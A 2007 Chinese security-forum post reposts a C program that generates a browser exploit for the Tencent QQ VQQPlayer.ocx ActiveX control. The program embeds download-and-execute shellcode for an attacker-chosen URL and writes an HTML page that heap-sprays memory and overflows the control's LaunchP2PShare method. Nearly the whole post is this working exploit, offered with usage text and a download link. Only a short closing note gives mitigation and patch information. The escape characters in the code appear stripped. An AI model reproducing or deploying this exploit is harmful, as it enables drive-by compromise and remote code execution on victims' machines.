- UID
- 4480
- 帖子
- 939
- 积分
- 670
- 紫菀
- 17 朵
- 花瓣
- 486 片
- 花蕊
- 245 朵
- 野草莓
- 7 个
- 蒲公英
- 7 朵
- 社区等级
- 23 级
- 在线时间
- 390 小时
- 注册时间
- 2006-12-18
- 登录状态
-
当前离线
|
沙发
发表于 2007-1-22 15:01
| 只看该作者
*------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
FILE *fp = NULL;
char *file = "fuck_exp1.html";
char *url = NULL;
//Download Shellcode by swan@0x557 bypass防火墙
// 经axis@ph4n0m加入了恢复栈平衡,不挂ie
unsigned char sc[] =
"x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70"
"x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8"
"xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00"
"x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00"
"x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45"
"x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40"
"x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75"
"x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00"
"x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5"
"x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a"
"x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c"
"x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c"
"x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45"
"x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59"
"x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08"
"x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00"
"x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03"
"xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7"
"x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c"
"x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41"
"xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d"
"x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24"
"x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5"
"x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e"
"x00";
char * header =
"<!-- axis' exploit! -->nn"
"<html>n"
"<head>n"
"<script language="javascript">n"
"tvar heapSprayToAddress = 0x0c010101;n"
"tvar shellcode = unescape("%u9090"+"%u9090"+ n";
char * footer =
"n"
"var heapBlockSize = 0x100000;n" //如果太小了,会造成时间上来不及分配,导致溢出失败
"var payLoadSize = shellcode.length * 2;n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);n"
"var spraySlide = unescape("%u9090%u9090");n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;n"
"memory = new Array();nn"
"for (i=0;i<heapBlocks;i++)n{n"
"ttmemory = spraySlide + shellcode;n}n"
"function getSpraySlide(spraySlide, spraySlideSize)n{nt"
"while (spraySlide.length*2<spraySlideSize)nt"
"{nttspraySlide += spraySlide;nt}n"
"tspraySlide = spraySlide.substring(0,spraySlideSize/2);ntreturn spraySlide;n}nn"
"</script>n";
char * trigger =
"n<script>n"
"function AxisFun()n"
"{n"
"tevil.LaunchP2PShare("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c", 10000);n"
"n}n"
"</script>n"
"</head>n"
"<OBJECT ID="evil" CLASSID="CLSID:{AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}"></OBJECT>n"
"<script>javascript:AxisFun();</script>n"
"</html>n";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf(""n"");
fprintf(fp, "%s", "" +n"");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
//把shellcode打印在header后面,然后用 " ) " 闭合
printf("";n");
fprintf(fp, "%s", "");n");
fflush(fp);
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
if (argc < 2)
{
printf("Tencent QQ VQQPlayer.ocx (all version) 0day!n");
printf("Bug Found by axis@ph4nt0mn");
printf("Date: 2006-12-27n");
printf("rnUsage: %s <URL> [Local htmlfile]rnn", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'n");
return;
}
printf("[+] download url:%sn", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%sn", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!n");
return;
}
//build evil html file
fprintf(fp, "%s", header);
fflush(fp);
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad((char *)buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
fprintf(fp, "%s", trigger);
fflush(fp);
printf("[+] exploit write to %s success!n", file);
}
----------------------------------------------------------------------------------------
建议:
禁止ie执行activex
厂商补丁:
目前厂商已经在2007.1.1日发布了升级补丁,请用户自行升级QQ:
http://www.qq.com
关于Ph4nt0m:
Ph4nt0m是国内的一个安全组织,由一群来自五湖四海的朋友,因为共同热爱网络安全而走到一起来。
欢迎访问我们的网站http://www.ph4nt0m.org
--EOF--
exp 下载:http://www.ph4nt0m.org/bbs/attachment.php?s=&postid=87380
[ 本帖最后由 射手座的情 于 2007-1-22 23:24 编辑 ] |
|